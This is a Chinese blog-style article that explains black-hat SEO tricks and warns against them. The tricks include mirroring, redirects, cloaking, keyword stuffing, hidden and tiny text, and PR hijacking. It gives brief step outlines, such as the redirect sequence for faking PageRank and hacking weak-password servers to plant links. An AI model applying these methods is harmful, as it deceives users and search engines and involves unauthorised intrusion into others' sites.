网站镜像通过复制整个网站或部分网页内容并分配以不同域名和服务器,以此欺骗搜索引擎对同一站点或同一页面进行多次索引的行为,这既是为什么有的网站注明禁止未授权不得做网站镜像的原因了,两个网站的完全一样,相似度过高必然会导致自己的网站受到影响。
地址重定向302redirect:302代表暂时性转移(TemporarilyMoved),在前些年,不少BlackHat
SEO曾广泛应用这项技术作弊,各大主要搜索引擎均加强了打击力度。即使网站客观上不是spam,也很容易被搜寻引擎容易误判为spam而遭到惩罚。大家肯定有这样的经历,搜索到某个网站的时候进去就变成另一个网站了,这种主要是通过跳转技术实现的,往往跳转到一个赢利性页面。
挂黑链扫描FTP或者服务器的弱口令、漏洞,然后黑掉网站,把链接挂进去。这是不合法的手段,这些SEOer也是我鄙视的,国内大有这样的人存在。这些是可以通过SeoQuake插件辅助发现的。
斗蓬法斗蓬法(cloaking)简单来讲就是网站站长用了两版不同的网页来达到最佳化的效果。一个版本只给搜索引擎看,一个版本给自己看。搜索引擎说这类做法是违规的,如果提供给搜索引擎的网站版本不能如实反映网页所包含的真实内容。如被发现,该网站会永久从搜索引擎名单中被剔除。
关键词堆积很多站长在优化关键字的时候,堆积了大量关键字,让搜索引擎以为网页具有相关性,关键词堆积技术利用一长串重复性的关键词来蒙混搜索引擎。而实际上,这些关键词有时候与网页内容相关,有时候则与网页内容无关。这类办法很少奏效,而且,也不太可能在或长或短的时间内将一个网站的排名哄抬至很高。
PR劫持PR劫持的方法是利用跳转。一般搜索引擎在处理301和302转向的时候,都是把目标URL当作实际应该收录的URL。当然也有特例,不过在大部分情况下是这样处理的。所以如果你从域名A做301或302跳转到域名B,而域名B的PR值比较高,域名A在PR更新后,也会显示域名B的PR值。最简单的就是先做301或302跳转到高PR的域名B,等PR更新过后,立刻取消转向,同时也获得了和B站相同的PR值。这个做假的PR显示值至少维持到下一次PR更新。
细微文字许多做搜索引擎优化的人士明白隐藏文字可能会遭到惩罚,所以就将本来隐藏的文字以细微的字体暴露出来。细微文字即使是使用微小的字体在网页不显眼的地方书写带有关键词的句子。一般这些文字是放在网页的最顶端或者最底部。这些文字的色彩虽然不是和隐藏文字那样与背景使用相同颜色,但是经常也以非常相近的颜色出现。
隐藏页面隐藏页面(cloaked
page)是有的网页使用程序或脚本来检测来访问的是搜索引擎还是普通用户。如果是搜索引擎,网页就返回经过优化的网页版本。如果来访的是普通人,返回的是另外一个版本。这种作弊方式,通常用户无法发现。因为一旦你的浏览器去看这个网页,无论是在页面上还是在HTML源文件中,你所得到的都已经是与搜索引擎看到的不同的版本。检测的方法是,看一下这个网页的快照。
隐藏文字隐藏文字(hidden
text)是在网页的HTML文件中放上含有关键词的文字,但这些字不能被用户所看到,只能被搜索引擎看到。可以有几种形式,比如说超小字号的文字,与背景同样颜色的文字,放在评论标签当中的文字,放在表格input标签里面的文字,通过样式表把文字放在不可见的层上面等等。
一推响工作室建议大家不要用黑帽SEO手段,对网站影响非常严重,后果不堪设想!
0条评论